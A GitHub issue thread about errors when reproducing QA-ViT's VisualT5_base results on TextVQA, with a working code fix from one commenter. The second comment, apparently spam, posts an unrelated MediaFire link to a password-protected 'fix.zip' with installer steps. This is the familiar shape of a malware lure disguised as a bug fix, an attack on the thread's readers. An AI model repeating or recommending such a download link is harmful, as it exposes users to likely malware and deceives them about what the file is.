### ISSUE TITLE
Issues with the reproduction of results

### ISSUE THREAD

**Issue by lky-violet** [amazon-science/QA-ViT#8]
Dear Author,

Thank you very much for your outstanding work on this project!

I am trying to reproduce the `VisualT5_base` results on the `textvqa` dataset using the `run_eval.py` file, but I have encountered some issues. Initially, on line 37, with the command `generated_ids = model.generate(**inputs, max_new_tokens=30, instructions_list=instructions_list)`, I received an error: `AttributeError: 'DistributedDataParallel' object has no attribute 'generate'`. After changing `model.generate` to `model.module.generate`, I encountered another error: `TypeError: _prepare_encoder_decoder_kwargs_for_generation() takes from 3 to 4 positional arguments but 5 were given`.

I am unsure where the problem lies and would greatly appreciate your guidance on this matter. Thank you very much for your help!

Best regards

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lky-violet** [comment]
Thank you for your response! I re-executed the `conda env create -f qavit.yml` command and changed `model.generate` to `model.module.generate`, which solved my issue!

**Comment by gregbugaj** [comment]
For the issue with error `TypeError: _prepare_encoder_decoder_kwargs_for_generation() takes from 3 to 4 positional arguments but 5 were given.`

You need to update the `VisualT5._prepare_encoder_decoder_kwargs_for_generation`  method and pop the `instructions_list`


```python
    def _prepare_encoder_decoder_kwargs_for_generation(
        self,
        inputs_tensor: torch.Tensor,
        model_kwargs,
        model_input_name: Optional[str],
        generation_config: GenerationConfig,
    ) -> Dict[str, Any]:

        # 0. Prepare model kwargs
        instructions_list = model_kwargs.pop("instructions_list", None)
        
        # 1. get encoder
        ...
```
